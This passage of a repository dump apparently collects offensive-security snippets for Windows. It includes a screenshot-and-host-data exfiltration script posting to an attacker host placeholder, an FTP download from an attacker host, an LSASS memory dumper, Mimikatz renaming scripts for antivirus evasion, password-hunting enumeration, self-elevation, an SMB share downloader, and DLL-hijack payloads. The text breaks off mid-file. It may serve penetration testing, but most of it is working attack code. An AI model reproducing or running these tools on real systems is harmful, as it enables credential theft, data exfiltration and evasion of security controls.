lpReserved 39 | ) 40 | { 41 | switch (ul_reason_for_call) 42 | { 43 | 44 | case DLL_PROCESS_ATTACH: 45 | executepayload(); 46 | case DLL_THREAD_ATTACH: 47 | case DLL_THREAD_DETACH: 48 | case DLL_PROCESS_DETACH: 49 | break; 50 | } 51 | return TRUE; 52 | } -------------------------------------------------------------------------------- /snippets/windows/utils/Enable-Privilege.ps1: -------------------------------------------------------------------------------- 1 | function Enable-Privilege { 2 | 3 | param( 4 | $Privilege, 5 | $ProcessId = $pid, 6 | [Switch] $Disable 7 | ) 8 | 9 | $definition = @' 10 | using System; 11 | using System.Runtime.InteropServices; 12 | 13 | public class AdjPriv 14 | { 15 | [DllImport("advapi32.dll", ExactSpelling = true, SetLastError = true)] 16 | internal static extern bool AdjustTokenPrivileges(IntPtr htok, bool disall, ref TokPriv1Luid newst, int len, IntPtr prev, IntPtr relen); 17 | 18 | [DllImport("advapi32.dll", ExactSpelling = true, SetLastError = true)] 19 | internal static extern bool OpenProcessToken(IntPtr h, int acc, ref IntPtr phtok); 20 | 21 | [DllImport("advapi32.dll", SetLastError = true)] 22 | internal static extern bool LookupPrivilegeValue(string host, string name, ref long pluid); 23 | 24 | [StructLayout(LayoutKind.Sequential, Pack = 1)] 25 | internal struct TokPriv1Luid 26 | { 27 | public int Count; 28 | public long Luid; 29 | public int Attr; 30 | } 31 | 32 | internal const int SE_PRIVILEGE_ENABLED = 0x00000002; 33 | internal const int SE_PRIVILEGE_DISABLED = 0x00000000; 34 | internal const int TOKEN_QUERY = 0x00000008; 35 | internal const int TOKEN_ADJUST_PRIVILEGES = 0x00000020; 36 | 37 | public static bool EnablePrivilege(long processHandle, string privilege, bool disable) 38 | { 39 | bool retVal; 40 | TokPriv1Luid tp; 41 | IntPtr hproc = new IntPtr(processHandle); 42 | IntPtr htok = IntPtr.Zero; 43 | retVal = OpenProcessToken(hproc, TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, ref htok); 44 | tp.Count = 1; 45 | tp.Luid = 
0; 46 | if(disable) 47 | { 48 | tp.Attr = SE_PRIVILEGE_DISABLED; 49 | } else { 50 | tp.Attr = SE_PRIVILEGE_ENABLED; 51 | } 52 | retVal = LookupPrivilegeValue(null, privilege, ref tp.Luid); 53 | retVal = AdjustTokenPrivileges(htok, false, ref tp, 0, IntPtr.Zero, IntPtr.Zero); 54 | return retVal; 55 | } 56 | } 57 | '@ 58 | 59 | $processHandle = (Get-Process -id $ProcessId).Handle; 60 | $type = Add-Type $definition -PassThru; 61 | $type[0]::EnablePrivilege($processHandle, $Privilege, $Disable); 62 | } 63 | -------------------------------------------------------------------------------- /snippets/windows/utils/GrabAndRun.ps1: -------------------------------------------------------------------------------- 1 | # ░▒▓ GrabAndRun.ps1 ▓▒░ 2 | # 3 | # Takes screenshot, grabs some local information, encrypts using X.509 public key and sends everything over HTTP 4 | 5 | Add-Type -AssemblyName System.Windows.Forms,System.Drawing 6 | $screens = [Windows.Forms.Screen]::AllScreens 7 | $top = ($screens.Bounds.Top | Measure-Object -Minimum).Minimum 8 | $left = ($screens.Bounds.Left | Measure-Object -Minimum).Minimum 9 | $width = ($screens.Bounds.Right | Measure-Object -Maximum).Maximum 10 | $height = ($screens.Bounds.Bottom | Measure-Object -Maximum).Maximum 11 | $bounds = [Drawing.Rectangle]::FromLTRB($left, $top, $width, $height) 12 | $screen = New-Object System.Drawing.Bitmap ([int]$bounds.width), ([int]$bounds.height) 13 | $graphics = [Drawing.Graphics]::FromImage($screen) 14 | $graphics.CopyFromScreen($bounds.Location, [Drawing.Point]::Empty, $bounds.size) 15 | $screenStream = New-Object System.IO.MemoryStream 16 | $screen.save($screenStream, [System.Drawing.Imaging.ImageFormat]::Jpeg) 17 | $screenBytes = $screenStream.ToArray() 18 | $screenStream.Flush() 19 | $screenStream.Dispose() 20 | $screenshot = [convert]::ToBase64String($screenBytes) 21 | $graphics.Dispose() 22 | $screen.Dispose() 23 | 24 | $os = $((Get-WmiObject -class Win32_OperatingSystem).Caption) 25 | $hostname = 
$env:Computername 26 | $domain = $env:UserDomain 27 | $user = "$env:USERNAME@$domain" 28 | $hwid = (Get-WmiObject Win32_ComputerSystemProduct).UUID 29 | $ipv4 = (Test-Connection -ComputerName $Hostname -Count 1).IPV4Address.IPAddressToString 30 | $arch = $env:PROCESSOR_ARCHITECTURE 31 | $isadmin = ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator) 32 | $report = $Hostname + "," + $Ipv4 + "," + $Arch + "," + $Username + "," + $IsAdmin + "," + $screenshot 33 | 34 | $certString = "MIIF[...]B3Ms=" 35 | 36 | $cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2 37 | $cert.Import([System.Text.Encoding]::UTF8.GetBytes($certString)) 38 | $encrypted = $cert.PublicKey.Key.Encrypt([System.Text.Encoding]::UTF8.GetBytes($report), $false) 39 | $encrypted = [System.Convert]::ToBase64String($encrypted) 40 | $encrypted 41 | 42 | Invoke-WebRequest -UseBasicParsing http://VAR_ATTACKER_HOST:443/ -ContentType "text/html" -Method POST -Body $encrypted 43 | -------------------------------------------------------------------------------- /snippets/windows/utils/PortScanning.ps1: -------------------------------------------------------------------------------- 1 | $ErrorActionPreference = "SilentlyContinue" 2 | $ports = 1..65535 3 | $ip = "VAR_TARGET_HOST" 4 | 5 | foreach ($port in $ports) { 6 | if(Test-Connection -BufferSize 32 -Count 1 -Quiet -ComputerName $ip) { 7 | $socket = new-object System.Net.Sockets.TcpClient($ip, $port) 8 | If($socket.Connected) { 9 | "$ip:$port" 10 | $socket.Close() 11 | } 12 | } 13 | } -------------------------------------------------------------------------------- /snippets/windows/utils/Self-Elevate.ps1: -------------------------------------------------------------------------------- 1 | if (-Not ([Security.Principal.WindowsPrincipal] 
[Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] 'Administrator')) { 2 | if ([int](Get-CimInstance -Class Win32_OperatingSystem | Select-Object -ExpandProperty BuildNumber) -ge 6000) { 3 | $CommandLine = "-File `"" + $MyInvocation.MyCommand.Path + "`" " + $MyInvocation.UnboundArguments 4 | Start-Process -FilePath PowerShell.exe -Verb Runas -ArgumentList $CommandLine 5 | Exit 6 | } 7 | } -------------------------------------------------------------------------------- /snippets/windows/utils/SharingIsCaring.ps1: -------------------------------------------------------------------------------- 1 | # ░▒▓ SharingIsCaring.ps1 ▓▒░ 2 | # 3 | # Massive SMB shares downloader used to test for data exposure in local networks 4 | # 5 | # Example: 6 | # C:\> powershell -exec bypass .\SharingIsCaring.ps1 -FileName hosts.txt 7 | 8 | [CmdletBinding()] 9 | 10 | Param( 11 | [Parameter(Mandatory=$true)] 12 | [String] $FileName, 13 | [String[]] $ExcludeShares = @("IPC$", "print$", "SYSVOL"), 14 | [Int] $ThrottleLimit = 16, 15 | [Int] $Timeout = 1800 16 | ) 17 | 18 | $HostNames = Get-Content $FileName 19 | 20 | $StartTime = Get-Date 21 | 22 | $RunspaceTimers = [HashTable]::Synchronized(@{}) 23 | $Runspaces = New-Object -TypeName System.Collections.ArrayList 24 | $RunspaceCounter = 1 25 | 26 | $ISS = [System.Management.Automation.Runspaces.InitialSessionState]::CreateDefault() 27 | $ISS.Variables.Add( 28 | (New-Object -TypeName System.Management.Automation.Runspaces.SessionStateVariableEntry -ArgumentList 'RunspaceTimers', $RunspaceTimers, '') 29 | ) 30 | 31 | $RunspacePool = [System.Management.Automation.Runspaces.RunspaceFactory]::CreateRunspacePool(1, $ThrottleLimit, $ISS, $Host) 32 | $RunspacePool.Open() 33 | 34 | $ShareCopyBlock = 35 | { 36 | [CmdletBinding()] 37 | Param( 38 | [int] $ID, 39 | [string] $CopySrc, 40 | [string] $CopyDst 41 | ) 42 | $RunspaceTimers.$ID = Get-Date 43 | New-Item -Path $CopyDst -Type Directory -ErrorAction 
SilentlyContinue 44 | Copy-Item -Path $CopySrc -Destination $CopyDst -Force -Recurse -ErrorAction SilentlyContinue 45 | } 46 | 47 | function Get-Result 48 | { 49 | [CmdletBinding()] 50 | Param( 51 | [switch] $Wait 52 | ) 53 | do 54 | { 55 | $More = $false 56 | foreach ($Runspace in $Runspaces) { 57 | $StartTime = $RunspaceTimers[$Runspace.ID] 58 | if ($Runspace.Handle.IsCompleted) 59 | { 60 | $Runspace.PowerShell.EndInvoke($Runspace.Handle) 61 | $Runspace.PowerShell.Dispose() 62 | $Runspace.PowerShell = $null 63 | $Runspace.Handle = $null 64 | } 65 | elseif ($null -ne $Runspace.Handle) 66 | { 67 | $More = $true 68 | } 69 | if ($Timeout -and $StartTime) 70 | { 71 | if ((New-TimeSpan -Start $StartTime).TotalSeconds -ge $Timeout -and $Runspace.PowerShell) { 72 | Write-Warning -Message ('Timeout {0}' -f $Runspace.IObject) 73 | $Runspace.PowerShell.Dispose() 74 | $Runspace.PowerShell = $null 75 | $Runspace.Handle = $null 76 | } 77 | } 78 | } 79 | if ($More -and $PSBoundParameters['Wait']) 80 | { 81 | Start-Sleep -Milliseconds 100 82 | } 83 | foreach ($Thread in $Runspaces.Clone()) 84 | { 85 | if (-not $Thread.Handle) { 86 | $Runspaces.Remove($Thread) 87 | } 88 | } 89 | } 90 | while ($More -and $PSBoundParameters['Wait']) 91 | } 92 | 93 | Write-Verbose -Message "$(Get-Date): Downloading shares..." 
94 | 95 | foreach ($HostName in $HostNames) 96 | { 97 | Get-Result 98 | $RunspaceCounter++ 99 | Write-Host "$(Get-Date): Checking $HostName" 100 | $NetView = net view \\$HostName /all 101 | if ($NetView) { 102 | $FromLine = ($NetView | Select-String -Pattern "---" | Select-Object LineNumber).LineNumber 103 | $NetView[$FromLine..($NetView.count - 3)] | ForEach-Object { 104 | $ShareLine = $_ -split "\s{2,}" 105 | $Share = $ShareLine[0] 106 | if ($ExcludeShares -NotContains $Share) { 107 | $CopySrc = "\\$HostName\$Share\*" 108 | $CopyDst = "$(Get-Location)\$HostName\$Share\" 109 | $Snippet = [System.Management.Automation.PowerShell]::Create().AddScript($ShareCopyBlock) 110 | [void] $Snippet.AddParameter('ID', $RunspaceCounter) 111 | [void] $Snippet.AddParameter('CopySrc', $CopySrc) 112 | [void] $Snippet.AddParameter('CopyDst', $CopyDst) 113 | $Snippet.RunspacePool = $RunspacePool 114 | [void]$Runspaces.Add(@{ 115 | Handle = $Snippet.BeginInvoke() 116 | PowerShell = $Snippet 117 | ID = $RunspaceCounter 118 | }) 119 | } 120 | } 121 | } 122 | } 123 | 124 | Get-Result -Wait 125 | Write-Progress -Activity 'Processing' -Status 'Done' -Completed 126 | $RunspacePool.Close() 127 | $RunspacePool.Dispose() -------------------------------------------------------------------------------- /snippets/windows/utils/SuperPing.ps1: -------------------------------------------------------------------------------- 1 | # Author: Merakel 2 | 3 | $ping = 4 | "server1", 5 | "server2", 6 | "server3" 7 | 8 | Function Super-Ping{ 9 | Param([Parameter(ValueFromPipeline=$true,Mandatory=$true)]$ping) 10 | 11 | Begin{ 12 | $runSpacePool = [RunSpaceFactory]::CreateRunspacePool(1, 5) 13 | $runSpacePool.Open() 14 | 15 | $jobs = @() 16 | $data = @() 17 | } 18 | 19 | Process{ 20 | $flags= @{"computername" = "$ping" ; "count" = "3"} 21 | Write-Host $flags 22 | $pipeline = [powershell]::Create().AddCommand("Test-Connection") 23 | Foreach($f in $flags.keys) 24 | { 25 | $pipeline.AddParameter($f, $flags.$f) | 
Out-Null 26 | } 27 | 28 | $pipeline.RunSpacePool = $runSpacePool #This sets the RunSpacePool to execute our current pipeline 29 | $status = $pipeline.BeginInvoke() #This executes the RunSpacePool we just currently created. 30 | 31 | $job = "" | Select-Object Status, Pipeline 32 | $job.Status = $status 33 | $job.Pipeline = $pipeline 34 | $jobs += $job 35 | } 36 | 37 | End{ 38 | While (@($jobs | Where-Object {$_.Status-ne $Null}).count -gt 0){ 39 | ForEach ($job in $obs){ 40 | If($job.Status.IsCompleted -eq $True){ 41 | $data += $job.Pipeline.EndInvoke($job.Status) 42 | $job.Pipeline.Dispose() 43 | $job.Status= $Null 44 | $job.Pipeline= $Null 45 | } 46 | } 47 | } 48 | Return $data 49 | } 50 | } 51 | 52 | $ping | Super-Ping -------------------------------------------------------------------------------- /snippets/windows/utils/Win10FirewallRules.ps1: -------------------------------------------------------------------------------- 1 | Get-NetFirewallRule -Action Allow -Enabled True -Direction Inbound | 2 | Format-Table -Property @{Name='DisplayName'; Expression={$_.DisplayName}; Width=15}, 3 | @{Name='Program'; Expression={($PSItem | Get-NetFirewallApplicationFilter).Program}; Width=60}, 4 | @{Name='Protocol'; Expression={($PSItem | Get-NetFirewallPortFilter).Protocol}; Width=10}, 5 | @{Name='LocalPort'; Expression={($PSItem | Get-NetFirewallPortFilter).LocalPort}; Width=5}, 6 | @{Name='RemotePort'; Expression={($PSItem | Get-NetFirewallPortFilter).RemotePort}; Width=5}, 7 | @{Name='RemoteAddress'; Expression={($PSItem | Get-NetFirewallPortFilter).RemoteAddress}; Width=15} -------------------------------------------------------------------------------- /snippets/windows/utils/WindowsEnum.ps1: -------------------------------------------------------------------------------- 1 | # Source https://raw.githubusercontent.com/absolomb/WindowsEnum/master/WindowsEnum.ps1 2 | # Usage 3 | # run script directly from powershell for quick standard checks 4 | # 5 | # For quick 
standard checks directly from CMD: 6 | # powershell -nologo -executionpolicy bypass -file WindowsEnum.ps1 7 | # 8 | # To run extensive file searches use extended parameter (it can take a long time, be patient!): 9 | # PS C:\> .\WindowsEnum.ps1 extended 10 | # From CMD: 11 | # powershell -nologo -executionpolicy bypass -file WindowsEnum.ps1 extended 12 | 13 | 14 | param($extended) 15 | 16 | $lines="------------------------------------------" 17 | function whost($a) { 18 | Write-Host 19 | Write-Host -ForegroundColor Green $lines 20 | Write-Host -ForegroundColor Green " "$a 21 | Write-Host -ForegroundColor Green $lines 22 | } 23 | 24 | 25 | whost "Windows Enumeration Script v 0.1 26 | by absolomb 27 | www.sploitspren.com" 28 | 29 | $standard_commands = [ordered]@{ 30 | 31 | 'Basic System Information' = 'Start-Process "systeminfo" -NoNewWindow -Wait'; 32 | 'Environment Variables' = 'Get-ChildItem Env: | ft Key,Value'; 33 | 'Network Information' = 'Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address'; 34 | 'DNS Servers' = 'Get-DnsClientServerAddress -AddressFamily IPv4 | ft'; 35 | 'ARP cache' = 'Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State'; 36 | 'Routing Table' = 'Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex'; 37 | 'Network Connections' = 'Start-Process "netstat" -ArgumentList "-ano" -NoNewWindow -Wait | ft'; 38 | 'Connected Drives' = 'Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft'; 39 | 'Firewall Config' = 'Start-Process "netsh" -ArgumentList "firewall show config" -NoNewWindow -Wait | ft'; 40 | 'Current User' = 'Write-Host $env:UserDomain\$env:UserName'; 41 | 'User Privileges' = 'start-process "whoami" -ArgumentList "/priv" -NoNewWindow -Wait | ft'; 42 | 'Local Users' = 'Get-LocalUser | ft Name,Enabled,LastLogon'; 43 | 'Logged in Users' = 'Start-Process "qwinsta" -NoNewWindow -Wait | ft'; 44 | 'Credential Manager' = 'start-process 
"cmdkey" -ArgumentList "/list" -NoNewWindow -Wait | ft' 45 | 'User Autologon Registry Items' = 'Get-ItemProperty -Path "Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon" | select "Default*" | ft'; 46 | 'Local Groups' = 'Get-LocalGroup | ft Name'; 47 | 'Local Administrators' = 'Get-LocalGroupMember Administrators | ft Name, PrincipalSource'; 48 | 'User Directories' = 'Get-ChildItem C:\Users | ft Name'; 49 | 'Searching for SAM backup files' = 'Test-Path %SYSTEMROOT%\repair\SAM ; Test-Path %SYSTEMROOT%\system32\config\regback\SAM'; 50 | 'Running Processes' = 'gwmi -Query "Select * from Win32_Process" | where {$_.Name -notlike "svchost*"} | Select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize'; 51 | 'Installed Software Directories' = 'Get-ChildItem "C:\Program Files", "C:\Program Files (x86)" | ft Parent,Name,LastWriteTime'; 52 | 'Software in Registry' = 'Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name'; 53 | 'Folders with Everyone Permissions' = 'Get-ChildItem "C:\Program Files\*", "C:\Program Files (x86)\*" | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match "Everyone"} } catch {}} | ft'; 54 | 'Folders with BUILTIN\User Permissions' = 'Get-ChildItem "C:\Program Files\*", "C:\Program Files (x86)\*" | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match "BUILTIN\Users"} } catch {}} | ft'; 55 | 'Checking registry for AlwaysInstallElevated' = 'Test-Path -Path "Registry::HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer" | ft'; 56 | 'Unquoted Service Paths' = 'gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike ''"*''} | select PathName, DisplayName, Name | ft'; 57 | 'Scheduled Tasks' = 'Get-ScheduledTask | where {$_.TaskPath -notlike 
"\Microsoft*"} | ft TaskName,TaskPath,State'; 58 | 'Tasks Folder' = 'Get-ChildItem C:\Windows\Tasks | ft'; 59 | 'Startup Commands' = 'Get-CimInstance Win32_StartupCommand | select Name, command, Location, User | fl'; 60 | 61 | } 62 | 63 | $extended_commands = [ordered]@{ 64 | 65 | 'Searching for Unattend and Sysprep files' = 'Get-Childitem -Path C:\ -Include *unattend*,*sysprep* -File -Recurse -ErrorAction SilentlyContinue | where {($_.Name -like "*.xml" -or $_.Name -like "*.txt" -or $_.Name -like "*.ini")} | Out-File C:\temp\unattendfiles.txt'; 66 | 'Searching for web.config files' = 'Get-Childitem -Path C:\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue | Out-File C:\temp\webconfigfiles.txt'; 67 | 'Searching for other interesting files' = 'Get-Childitem -Path C:\ -Include *password*,*cred*,*vnc* -File -Recurse -ErrorAction SilentlyContinue | Out-File C:\temp\otherfiles.txt'; 68 | 'Searching for various config files' = 'Get-Childitem -Path C:\ -Include php.ini,httpd.conf,httpd-xampp.conf,my.ini,my.cnf -File -Recurse -ErrorAction SilentlyContinue | Out-File C:\temp\configfiles.txt' 69 | 'Searching HKLM for passwords' = 'reg query HKLM /f password /t REG_SZ /s | Out-File C:\temp\hklmpasswords.txt'; 70 | 'Searching HKCU for passwords' = 'reg query HKCU /f password /t REG_SZ /s | Out-File C:\temp\hkcupasswords.txt'; 71 | 'Searching for files with passwords' = 'Get-ChildItem c:\* -include *.xml,*.ini,*.txt,*.config -Recurse -ErrorAction SilentlyContinue | Where-Object {$_.PSPath -notlike "*C:\temp*" -and $_.PSParentPath -notlike "*Reference Assemblies*" -and $_.PSParentPath -notlike "*Windows Kits*"}| Select-String -Pattern "password" | Out-File C:\temp\password.txt'; 72 | 73 | } 74 | function RunCommands($commands) { 75 | ForEach ($command in $commands.GetEnumerator()) { 76 | whost $command.Name 77 | Invoke-Expression $command.Value 78 | } 79 | } 80 | 81 | 82 | RunCommands($standard_commands) 83 | 84 | if ($extended) { 85 | if ($extended.ToLower() 
-eq 'extended') { 86 | $result = Test-Path C:\temp 87 | if ($result -eq $False) { 88 | New-Item C:\temp -type directory 89 | } 90 | whost "Results writing to C:\temp\ 91 | This may take a while..." 92 | RunCommands($extended_commands) 93 | whost "Script Finished! Check your files in C:\temp\" 94 | } 95 | } 96 | else { 97 | whost "Script finished!" 98 | } 99 | 100 | 101 | 102 | 103 | 104 | -------------------------------------------------------------------------------- /snippets/windows/utils/base64.vbs: -------------------------------------------------------------------------------- 1 | Function Base64Encode(inData) 2 | Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" 3 | Dim cOut, sOut, I 4 | For I = 1 To Len(inData) Step 3 5 | Dim nGroup, pOut, sGroup 6 | nGroup = &H10000 * Asc(Mid(inData, I, 1)) + _ 7 | &H100 * MyASC(Mid(inData, I + 1, 1)) + MyASC(Mid(inData, I + 2, 1)) 8 | nGroup = Oct(nGroup) 9 | nGroup = String(8 - Len(nGroup), "0") & nGroup 10 | pOut = Mid(Base64, CLng("&o" & Mid(nGroup, 1, 2)) + 1, 1) + _ 11 | Mid(Base64, CLng("&o" & Mid(nGroup, 3, 2)) + 1, 1) + _ 12 | Mid(Base64, CLng("&o" & Mid(nGroup, 5, 2)) + 1, 1) + _ 13 | Mid(Base64, CLng("&o" & Mid(nGroup, 7, 2)) + 1, 1) 14 | sOut = sOut + pOut 15 | Next 16 | Select Case Len(inData) Mod 3 17 | Case 1: '8 bit final 18 | sOut = Left(sOut, Len(sOut) - 2) + "==" 19 | Case 2: '16 bit final 20 | sOut = Left(sOut, Len(sOut) - 1) + "=" 21 | End Select 22 | Base64Encode = sOut 23 | End Function 24 | Function MyASC(OneChar) 25 | If OneChar = "" Then MyASC = 0 Else MyASC = Asc(OneChar) 26 | End Function -------------------------------------------------------------------------------- /snippets/windows/utils/ftp.bat: -------------------------------------------------------------------------------- 1 | REM ftp -v -n -s:ftp.txt 2 | 3 | echo open VAR_ATTACKER_HOST > ftp.txt 4 | echo user anonymous >> ftp.txt 5 | echo ftp >> ftp.txt 6 | echo bin >> ftp.txt 7 | echo get file >> ftp.txt 
8 | echo bye >> ftp.txt -------------------------------------------------------------------------------- /snippets/windows/utils/icacls.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | REM Source: https://raw.githubusercontent.com/ankh2054/windows-pentest/master/icacls.bat 3 | REM Description: Script that queries all services and searches for exeuctables that give the Everyone group RW access. 4 | REM Type: Incorrect file permissions 5 | REM Note: The ^ characters escapes certain characters that brerak the FOR loop. 6 | REM Note: tokens=1* - The value at the first delimeter and everything after. 7 | for /f "tokens=1*" %%m in ('sc query state^= all ^| find "SERVICE_NAME"') do ( 8 | for /f "tokens=1* delims=: " %%r in ('sc qc "%%~n" ^| find "BINARY_PATH_NAME"') do ( 9 | for /f "delims=" %%x in ('echo(%%~s^| findstr /L /V /I /C:"%SystemRoot%\System32" /C:"%SystemRoot%\SysWOW64"') do ( 10 | icacls "%%~x" 11 | ) 12 | ) 13 | ) 14 | -------------------------------------------------------------------------------- /snippets/windows/utils/mimikatz-Invoke-Mimikatz-obfuscate.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Original: https://gist.githubusercontent.com/infosecn1nja/bb0771adb879f1690a0dd8dfa0fc728b/raw/70d45ad3ac382554d897f1d7b3673452fa7a6dfb/obfuscate-mimikatz.sh 4 | 5 | if [[ -z $1 ]]; then 6 | echo './obfuscate-Invoke-Mimikatz.sh Invoke-Mimikatz.ps1 Invoke-Minidoggiez.ps1' 7 | exit 1 8 | fi 9 | 10 | 11 | randstr(){< /dev/urandom tr -dc a-zA-Z0-9 | head -c${1:-8};} 12 | 13 | cp $1 $2 14 | sed -i -e "s/Invoke-Mimikatz/Invoke-Minidoggiez/g" $2 15 | sed -i -e '/<#/,/#>/c\\' $2 16 | sed -i -e "s/^[[:space:]]*#.*$//g" $2 17 | sed -i -e "s/DumpCreds/PullLove/g" $2 18 | sed -i -e "s/DumpCerts/PullUniverse/g" $2 19 | sed -i -e "s/CustomCommand/CustomizedThing/g" $2 20 | sed -i -e "s/TypeBuilder/$(randstr)/g" $2 21 | sed -i -e "s/Win32Types/$(randstr)/g" 
$2 22 | sed -i -e "s/Win32Functions/$(randstr)/g" $2 23 | sed -i -e "s/shellcode/$(randstr)/g" $2 24 | sed -i -e "s/PEBytes64/$(randstr)/g" $2 25 | sed -i -e "s/PEBytes32/$(randstr)/g" $2 26 | sed -i -e "s/ArgumentPtr/$(randstr)/g" $2 27 | sed -i -e "s/CallDllMainSC1/$(randstr)/g" $2 28 | -------------------------------------------------------------------------------- /snippets/windows/utils/mimikatz-clone-obfuscated.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Original: https://s3cur3th1ssh1t.github.io/Building-a-custom-Mimikatz-binary/ 4 | 5 | if [[ -z $1 ]]; then 6 | echo './mimikatz-clone-obfuscated.sh' 7 | exit 1 8 | fi 9 | 10 | 11 | randstr(){< /dev/urandom tr -dc a-zA-Z0-9 | head -c${1:-8};} 12 | 13 | randname=randstr() 14 | RANDNAME=${randname^^} 15 | Randname=${randname^} 16 | randname2=randstr() 17 | RANDNAME2=${randname2^^} 18 | Randname2=${randname2^} 19 | 20 | git clone https://github.com/gentilkiwi/mimikatz.git $randname 21 | mv $randname/mimikatz $randname/$randname 22 | find windows/ -type f -print0 | xargs -0 sed -i "s/mimikatz/$randname/g" 23 | find windows/ -type f -print0 | xargs -0 sed -i "s/MIMIKATZ/$RANDNAME/g" 24 | find windows/ -type f -print0 | xargs -0 sed -i "s/Mimikatz/$Randname/g" 25 | find windows/ -type f -print0 | xargs -0 sed -i "s/DELPY/$Randname/g" 26 | find windows/ -type f -print0 | xargs -0 sed -i "s/Benjamin/$Randname/g" 27 | find windows/ -type f -print0 | xargs -0 sed -i "s/benjamin@gentilkiwi.com/$Randname/g" 28 | find windows/ -type f -print0 | xargs -0 sed -i "s/creativecommons/$Randname/g" 29 | find windows/ -type f -print0 | xargs -0 sed -i "s/gentilkiwi/$Randname/g" 30 | find windows/ -type f -print0 | xargs -0 sed -i "s/kiwi/$randname2/g" 31 | find windows/ -type f -print0 | xargs -0 sed -i "s/KIWI/$RANDNAME2/g" 32 | find windows/ -type f -print0 | xargs -0 sed -i "s/Kiwi/$Randname2/g" 33 | find windows/ -type f -print0 | xargs -0 sed -i "s/A La 
Vie/$(randstr)/g" 34 | find windows/ -type f -print0 | xargs -0 sed -i "s/Amour/$(randstr)/g" 35 | find windows/ -type f -print0 | xargs -0 sed -i "s/mimidrv/$(randstr)/g" 36 | find windows/ -type f -name '*mimikatz*' | while read FILE ; do 37 | newfile="$(echo ${FILE} |sed -e "s/mimikatz/$randname/g")"; 38 | mv "${FILE}" "${newfile}"; 39 | done 40 | find windows/ -type f -name '*kiwi*' | while read FILE ; do 41 | newfile="$(echo ${FILE} |sed -e "s/kiwi/$randname2/g")"; 42 | mv "${FILE}" "${newfile}"; 43 | done -------------------------------------------------------------------------------- /snippets/windows/utils/minidump.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Diagnostics; 3 | using System.Runtime.InteropServices; using System.IO; 4 | 5 | namespace MiniDump { 6 | 7 | class Program { 8 | 9 | [DllImport("Dbghelp.dll")] 10 | static extern bool MiniDumpWriteDump(IntPtr hProcess, int ProcessId, IntPtr hFile, int DumpType, IntPtr ExceptionParam, IntPtr UserStreamParam, IntPtr CallbackParam); 11 | [DllImport("kernel32.dll")] 12 | static extern IntPtr OpenProcess(uint processAccess, bool bInheritHandle, int processId); 13 | 14 | static void Main(string[] args) { 15 | if (args.Length == 0) 16 | { 17 | System.Console.WriteLine("Provide dump file path"); 18 | return 1; 19 | } 20 | FileStream dumpFile = new FileStream(args[0], FileMode.Create); 21 | Process[] lsass = Process.GetProcessesByName("lsass"); 22 | int lsass_pid = lsass[0].Id; 23 | IntPtr handle = OpenProcess(0x001F0FFF, false, lsass_pid); 24 | bool dumped = MiniDumpWriteDump(handle, lsass_pid, dumpFile.SafeFileHandle.DangerousGetHandle(), 2, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero); 25 | } 26 | 27 | } 28 | 29 | } -------------------------------------------------------------------------------- /snippets/windows/utils/run_bat.c: -------------------------------------------------------------------------------- 1 | // x86_64-w64-mingw32-gcc 
run_bat.c -o mssvc.exe 2 | 3 | #include 4 | 5 | int main () 6 | { 7 | int i; 8 | i = system("cmd /c C:\\Python27\\get.bat"); 9 | return 0; 10 | } -------------------------------------------------------------------------------- /snippets/windows/utils/run_dll1.c: -------------------------------------------------------------------------------- 1 | // Minimalistic approach 2 | // x86_64-w64-mingw32-gcc run_dll1.c -o lib.dll -shared 3 | 4 | #include 5 | 6 | BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) { 7 | if (dwReason == DLL_PROCESS_ATTACH) { 8 | system("cmd.exe /c whoami > %TEMP%\\whoami.txt"); 9 | ExitProcess(0); 10 | } 11 | return TRUE; 12 | } -------------------------------------------------------------------------------- /snippets/windows/utils/run_dll2.cpp: -------------------------------------------------------------------------------- 1 | // x86_64-w64-mingw32-g++ run_dll2.cpp -o lib.dll -shared 2 | // get.bat: %COMSPEC% /c whoami > C:\Python27\whoami.txt 3 | 4 | #include 5 | 6 | int fileExist(LPCTSTR file) { 7 | WIN32_FIND_DATA FindFileData; 8 | HANDLE hFind; 9 | 10 | hFind = FindFirstFile(file, &FindFileData); 11 | if (hFind == INVALID_HANDLE_VALUE) 12 | { 13 | MessageBox(0, NULL, TEXT("File not found"), MB_OK); 14 | return 0; 15 | } 16 | else 17 | { 18 | FindClose(hFind); 19 | } 20 | return 1; 21 | } 22 | 23 | void scriptExec(void) { 24 | 25 | TCHAR batPath[50] = TEXT("C:\\Python27\\get.bat"); 26 | 27 | if (!fileExist(batPath)) { 28 | return; 29 | } 30 | 31 | STARTUPINFO info = { sizeof(info) }; 32 | PROCESS_INFORMATION processInfo; 33 | TCHAR lpszClientPath[100] = TEXT("C:\\Windows\\system32\\cmd.exe /c C:\\Python27\\get.bat"); 34 | if (CreateProcess(NULL, lpszClientPath, 